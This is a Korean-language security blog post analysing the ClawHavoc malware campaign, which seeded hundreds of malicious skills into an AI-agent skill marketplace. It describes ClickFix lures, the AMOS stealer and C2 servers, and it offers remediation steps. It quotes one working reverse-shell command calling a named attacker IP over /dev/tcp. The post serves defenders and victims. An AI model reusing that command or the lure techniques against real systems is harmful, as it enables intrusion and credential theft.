- Authors
- Name
- 오늘의 바이브
2,857개 중 341개가 악성이었다
2026년 2월 1일, Koi Security 연구팀이 ClawHub 마켓플레이스 전체를 감사했다. 2,857개 스킬 중 341개가 악성으로 판명됐다. 비율로 따지면 약 12%다. 10개 중 1개 이상이 악성 코드를 품고 있었다는 뜻이다.
더 충격적인 건 이 341개 중 335개가 단일 캠페인에서 비롯됐다는 사실이다. Koi Security는 이 공격을 ClawHavoc이라 명명했다. 조직적이고, 체계적이고, 대규모였다.
2월 16일 기준으로 ClawHub은 10,700개 이상의 스킬로 확장됐다. 악성 스킬도 824개로 2배 이상 증가했다. 마켓플레이스가 커지는 속도를 보안 검증이 따라가지 못하고 있다.
이 글에서는 ClawHavoc 캠페인이 어떻게 341개 악성 스킬을 퍼뜨렸는지, 어떤 경로로 피해자를 감염시켰는지, 무엇을 탈취했는지 추적한다.
ClawHavoc: 단일 캠페인의 해부
ClawHavoc은 무작위 공격이 아니었다. 정밀하게 타겟팅된 공급망 공격이다. 공격자들은 OpenClaw 사용자들이 어떤 스킬을 찾는지 분석하고, 그 수요를 노렸다.
335개 악성 스킬의 카테고리별 분포를 보면 전략이 보인다.
| 카테고리 | 개수 | 타겟 |
|---|---|---|
| YouTube 요약 도구 | 57 | 대중적 도달 |
| Polymarket 봇 | 34 | 예측 시장 거래자 |
| Solana 지갑 유틸리티 | 33 | 암호화폐 사용자 |
| Phantom 지갑 도구 | 28 | 솔라나 생태계 |
| 자동 업데이터 | 28 | 정당성 가장 |
| ClawHub 오타 도메인 | 29 | 의존성 혼동 |
| Google Workspace 통합 | 17 | 생산성 도구 접근 |
| Ethereum 가스 추적기 | 15 | DeFi 사용자 |
| Yahoo Finance 연동 | 51 | 금융/소셜 미디어 |
| 기타 | 43 | 다양한 니즈 |
패턴이 명확하다. 암호화폐 사용자가 핵심 타겟이다. Solana, Phantom, Ethereum 관련 스킬이 76개다. 암호화폐 지갑에는 현금과 다름없는 자산이 들어 있다. 탈취하면 즉시 현금화할 수 있다.
두 번째 타겟은 대중적 도구 사용자다. YouTube 요약기, Google Workspace 통합처럼 누구나 필요로 하는 기능을 미끼로 썼다. 넓은 그물을 던져 최대한 많은 피해자를 낚는 전략이다.
29개의 타이포스쿼팅 스킬도 눈에 띈다. clawhubb, cllawhub, clawhub-official 같은 이름으로 사용자의 오타를 노렸다. npm이나 PyPI에서 수년간 반복된 의존성 혼동 공격과 동일한 수법이다.
감염 경로: ClickFix 소셜 엔지니어링
ClawHavoc의 감염 경로는 기술적으로 정교하지 않다. 대신 소셜 엔지니어링에 의존한다. 사용자가 스스로 악성 코드를 실행하게 만드는 것이다.
스킬 문서에는 "필수 전제조건" 섹션이 있었다. 스킬을 사용하려면 먼저 특정 소프트웨어를 설치해야 한다고 안내했다. 이게 함정이다.
macOS 사용자 경로는 이랬다.
- 스킬 문서가 glot.io 링크를 제공한다
- 링크에는 Base64로 인코딩된 셸 명령어가 있다
- "터미널에 붙여넣고 실행하라"고 지시한다
- 사용자가 따르면, 원격 서버에서 드로퍼가 다운로드된다
- 드로퍼가 **Atomic macOS Stealer(AMOS)**를 설치한다
Windows 사용자 경로는 약간 달랐다.
- GitHub에서 비밀번호 보호된 ZIP 파일을 다운로드하라고 안내한다
- 비밀번호는 "AuthTool" 같은 그럴듯한 이름과 함께 제공된다
- ZIP을 풀면 VMProtect로 패킹된 인포스틸러가 실행된다
왜 비밀번호 보호 ZIP인가? 안티바이러스 우회를 위해서다. 암호화된 압축 파일은 백신이 내용을 스캔하지 못한다. 사용자가 직접 비밀번호를 입력해 풀어야 하고, 그 순간 악성 코드가 실행된다.
이 기법을 ClickFix라고 부른다. 복잡한 익스플로잇 없이, 사용자의 신뢰와 행동을 악용한다. 기술적으로 단순하지만 효과적이다. 사용자가 직접 실행했으니 백신도 막기 어렵다.
AMOS: 521KB에 담긴 완전한 탈취 도구
ClawHavoc이 배포한 핵심 페이로드는 Atomic macOS Stealer, 줄여서 AMOS다. Telegram에서 월 500~1,000달러에 판매되는 상용 악성코드다. Malware-as-a-Service(MaaS) 모델이다.
AMOS 바이너리의 기술적 특성을 보면 제작자의 실력이 느껴진다.
- 521KB 유니버설 Mach-O 바이너리 (x86_64 + arm64 모두 지원)
- Ad-hoc 서명 (Apple 인증서 없음)
- 무작위 식별자:
jhzhhfomng - 문자열 완전 암호화 (정적 분석 회피)
문자열이 완전 암호화됐다는 건 보안 연구원이 바이너리를 열어봐도 어떤 기능을 하는지 바로 알기 어렵다는 뜻이다. 역공학을 어렵게 만드는 기법이다.
AMOS가 탈취하는 데이터 목록은 방대하다.
브라우저 데이터: Chrome, Safari, Firefox, Edge의 저장된 비밀번호, 쿠키, 자동완성 데이터, 검색 기록
암호화폐 지갑: Exodus, Binance, Electrum, Atomic, Coinbase, MetaMask 등 60개 이상의 브라우저 확장 프로그램과 로컬 지갑 파일
시스템 자격증명: macOS Keychain 전체, SSH 개인키, 셸 히스토리(.bash_history, .zsh_history)
클라우드 서비스: AWS, Google Cloud, Azure 자격증명, 개발자 .env 파일
메신저: Telegram 세션 데이터와 채팅 기록
개인 파일: 데스크탑과 문서 폴더의 파일들
핵심 함수 copyDirectoryWithExclusions()는 방대한 파일 계층 구조를 선택적으로 복사한다. 필요 없는 시스템 파일은 제외하고, 가치 있는 데이터만 효율적으로 수집한다.
C2 인프라와 역셸 백도어
Koi Security가 추적한 C2(Command & Control) 인프라는 여러 서버로 분산돼 있었다.
| IP 주소 | 역할 |
|---|---|
| 91.92.242.30 | 주 페이로드 서버 |
| 95.92.242.30 | 보조 페이로드 |
| 96.92.242.30 | 보조 페이로드 |
| 202.161.50.59 | 데이터 수집 |
| 54.91.154.110 | 역셸 서버 |
91.92.242.30이 핵심이다. 341개 악성 스킬 모두 이 서버에서 페이로드를 다운로드했다. 단일 C2 인프라를 공유했다는 건, 이게 조직적인 단일 캠페인이라는 강력한 증거다.
더 위험한 건 역셸(Reverse Shell) 백도어다. AMOS가 자동으로 데이터를 탈취하는 것과 별개로, 일부 스킬은 역셸을 설치했다.
/usr/bin/nohup /bin/bash -c '/bin/bash -i >/dev/tcp/54.91.154.110/13338 0>&1 &'
이 코드가 실행되면 공격자가 피해자 시스템에 직접 접속할 수 있다. 대화형 셸 액세스다. AMOS의 자동 탈취가 1단계라면, 역셸은 2단계다. 더 깊이 침투하고, 더 많은 정보를 수집하고, 필요하면 추가 악성 코드를 설치할 수 있다.
better-polymarket과 polymarket-all-in-one 스킬에서 이 역셸 코드가 발견됐다. 정상적인 기능을 하는 것처럼 보이는 코드 사이에 숨겨진 C2 연결이 있었다.
이상 사례: 6개의 독립 공격자
341개 악성 스킬 중 335개는 ClawHavoc 캠페인에 속했다. 나머지 6개는 별개의 공격이었다. 독립적인 공격자들이 같은 생태계를 노렸다는 뜻이다.
Hidden Backdoor (2개): better-polymarket, polymarket-all-in-one. 정상적으로 작동하는 코드 속에 C2 연결이 숨겨져 있었다. ClawHavoc과 달리 즉각적인 악성 행위 없이 잠복하는 방식이다.
AuthTool 캠페인 (3개): 비밀번호 보호된 ZIP 파일을 배포했다. ClawHavoc과 유사한 기법이지만, 다른 C2 인프라를 사용했다.
직접 자격증명 탈취 (1개): rankaj라는 스킬. 다른 악성코드 설치 없이 .env 파일 같은 환경 변수 파일을 직접 읽어 전송했다. 단순하지만 효과적이다.
이 사실이 시사하는 바는 분명하다. ClawHub은 여러 위협 행위자들의 놀이터가 됐다. 한 캠페인이 정리되더라도 다른 공격자들이 같은 수법으로 계속 시도할 것이다.
타임라인: 5일 만에 터진 폭탄
ClawHavoc 캠페인의 타임라인은 공격의 속도를 보여준다.
1월 27일: 최초 악성 스킬 업로드 시작. 최소 14개가 첫날 올라왔다.
1월 27~29일: 공격자들이 빠르게 스킬을 추가했다. 암호화폐 관련 스킬이 집중적으로 올라왔다.
1월 29~31일: YouTube 도구, Google Workspace 통합 등 대중적 카테고리로 확장했다.
1월 31일: 대규모 업로드. 하루에 100개 이상의 악성 스킬이 추가됐다.
2월 1일: Koi Security가 ClawHub 전체 감사 시작. 2,857개 스킬 중 341개 악성 확인.
2월 2일: ClawHavoc 캠페인 공개 발표. 언론 보도 시작.
2월 3일: OpenClaw 측이 사용자 신고 기능 도입. 3건 신고 시 스킬 자동 숨김.
2월 16일: ClawHub이 10,700개 스킬로 확장. 악성 스킬도 824개로 증가.
5일이다. 최초 업로드부터 341개 악성 스킬이 퍼지기까지 단 5일. 그리고 마켓플레이스가 커지면서 악성 스킬도 함께 늘어났다. 보안 팀이 따라잡을 수 없는 속도다.
왜 ClawHub인가: 공급망 공격의 완벽한 표적
ClawHub이 공격자들에게 매력적인 이유는 명확하다.
첫째, 모더레이션 부재. 누구나 스킬을 업로드할 수 있었다. 검증 절차 없이 즉시 마켓플레이스에 등록됐다. 공격자 입장에서는 장벽이 없는 것이다.
둘째, 신뢰의 전이. OpenClaw는 GitHub 역사상 가장 빠르게 성장한 프로젝트 중 하나다. 14만 스타가 넘는다. 이 신뢰가 ClawHub의 스킬들에도 전이됐다. "OpenClaw 공식 마켓플레이스니까 안전하겠지"라는 심리다.
셋째, 권한의 범위. OpenClaw 에이전트는 이메일, WhatsApp, Telegram, 캘린더, 파일 시스템에 접근한다. 스킬이 악성이면 이 모든 권한이 공격자에게 넘어간다. 일반적인 악성 앱보다 훨씬 넓은 공격 표면이다.
넷째, 사용자층 특성. OpenClaw 얼리 어답터들은 기술에 관심 있는 개발자, 암호화폐 투자자가 많다. 탈취할 가치가 있는 자산을 가진 사람들이다.
이건 npm, PyPI, VS Code 확장 프로그램에서 반복된 패턴이다. 개발자 생태계의 마켓플레이스는 공급망 공격의 단골 표적이다. AI 에이전트 생태계도 예외가 아니었다.
OpenClaw의 대응: 너무 적고, 너무 늦었다
OpenClaw 측의 대응은 미흡했다.
사용자 신고 기능을 도입했다. 3건의 신고가 접수되면 스킬이 자동으로 숨겨진다. 그러나 이건 사후 대응이다. 이미 누군가가 피해를 입은 후에야 신고가 들어온다.
VirusTotal 연동을 발표했다. 업로드된 스킬을 SHA-256 해싱하고 VirusTotal의 Code Insight AI로 분석한다고 했다. 그러나 새로운 악성코드는 VirusTotal 데이터베이스에 없을 수 있다. 탐지율에 한계가 있다.
매일 재스캔한다고 했다. 이미 업로드된 스킬을 매일 다시 검사한다. 하지만 824개로 늘어난 악성 스킬을 보면 효과가 의문이다.
무엇이 빠졌는가?
사전 검증 프로세스가 없다. 스킬이 업로드되기 전에 코드 리뷰를 하는 절차가 없다. npm의 초창기와 같은 상태다.
샌드박스 실행 환경이 없다. 스킬이 어떤 네트워크 연결을 하는지, 어떤 파일에 접근하는지 격리된 환경에서 먼저 테스트하는 기능이 없다.
권한 최소화 원칙이 적용되지 않는다. 스킬이 필요로 하는 권한과 실제 부여되는 권한 사이에 괴리가 있다.
Arize의 개발자 관계 담당 Laurie Voss는 OpenClaw를 "보안상 재앙" 상태라고 표현했다. 과장이 아니다.
피해자가 할 수 있는 것
이미 ClawHub에서 스킬을 설치했다면?
1단계: Clawdex 스캐너 실행. Koi Security가 무료로 제공하는 도구다. 설치된 스킬이 알려진 악성 목록에 있는지 확인한다.
2단계: 네트워크 연결 확인. 91.92.242.30, 54.91.154.110 등 알려진 C2 IP로의 아웃바운드 연결이 있는지 확인한다. 방화벽 로그나 Little Snitch 같은 도구를 쓴다.
3단계: 자격증명 순환. 브라우저에 저장된 비밀번호, 암호화폐 지갑, 클라우드 서비스 키를 모두 변경한다. 특히 .env 파일에 있던 API 키는 즉시 폐기하고 재발급받는다.
4단계: 2FA 점검. 2단계 인증이 설정된 계정의 복구 코드가 유출됐을 수 있다. 가능하면 복구 코드를 재생성한다.
5단계: 격리 환경으로 이전. 앞으로 OpenClaw를 쓰려면 가상머신이나 Docker 컨테이너에서 실행한다. 호스트 시스템과 격리한다.
가장 안전한 방법? 신뢰할 수 있는 스킬만 화이트리스트로 관리하고, 새 스킬 설치는 극도로 신중하게 한다.
AI 에이전트 생태계의 구조적 문제
ClawHavoc은 OpenClaw만의 문제가 아니다. AI 에이전트 생태계 전체가 같은 위험을 안고 있다.
AI 에이전트의 가치는 자율성에서 온다. 사용자 개입 없이 작업을 완료한다. 그러나 자율성은 권한을 필요로 한다. 파일 접근, 네트워크 통신, API 호출. 권한이 클수록 더 유용하고, 권한이 클수록 더 위험하다.
플러그인/스킬 생태계는 이 자율성을 확장한다. 커뮤니티가 기능을 추가한다. 오픈소스의 장점이다. 그러나 누구나 기여할 수 있다는 건, 악의적 행위자도 기여할 수 있다는 뜻이다.
중앙화된 마켓플레이스는 신뢰의 허브가 된다. 사용자는 개별 스킬을 검증하지 않는다. 마켓플레이스를 신뢰한다. 이 신뢰가 악용되면 피해가 증폭된다.
npm, PyPI, Chrome Web Store, VS Code Marketplace. 모든 개발자 생태계가 같은 문제를 겪었다. AI 에이전트 생태계도 예외가 아니다. 아니, 권한의 범위가 더 넓기 때문에 위험은 더 크다.
교훈: 속도와 보안의 트레이드오프
OpenClaw는 GitHub 역사상 가장 빠르게 성장했다. 48시간에 34,168 스타. 피크 시간에 710 스타/시간. 2일 만에 10만 스타.
ClawHub도 빠르게 성장했다. 2월 1일 2,857개 스킬에서 2월 16일 10,700개 스킬로. 2주 만에 4배.
성장 속도에 보안이 따라가지 못했다. 341개 악성 스킬이 5일 만에 퍼진 건 우연이 아니다. 검증 절차가 없었기 때문이다.
이건 트레이드오프다. 엄격한 검증을 도입하면 성장 속도가 느려진다. 개발자들이 떠난다. 생태계가 위축된다. 검증 없이 열어두면 빠르게 성장하지만, 공격자들도 빠르게 침투한다.
OpenClaw는 성장을 선택했다. 그 대가를 사용자들이 치르고 있다.
앞으로 AI 에이전트 마켓플레이스가 더 생겨날 것이다. 그들이 어떤 선택을 하느냐에 따라 생태계의 보안 수준이 결정된다. ClawHavoc은 잘못된 선택의 결과가 어떤지 보여주는 사례다.
출처:
- OpenClaw Marketplace Flooded with 341 Malicious Skills — SecureBlink
- ClawHavoc: 341 Malicious Clawed Skills Found — Koi Security
- Hundreds of Malicious Skills Found in OpenClaw's ClawHub — eSecurity Planet
- OpenClaw Security Crisis — Security Boulevard
- OpenClaw ClawHub Under Attack: 341 Malicious Plugins — Coinpedia
- ClawHavoc Poisoned ClawHub with 1,184 Malicious Skills — GBHackers
- OpenClaw is a Security Nightmare — Barrack.ai
- 이미지 출처 — Unsplash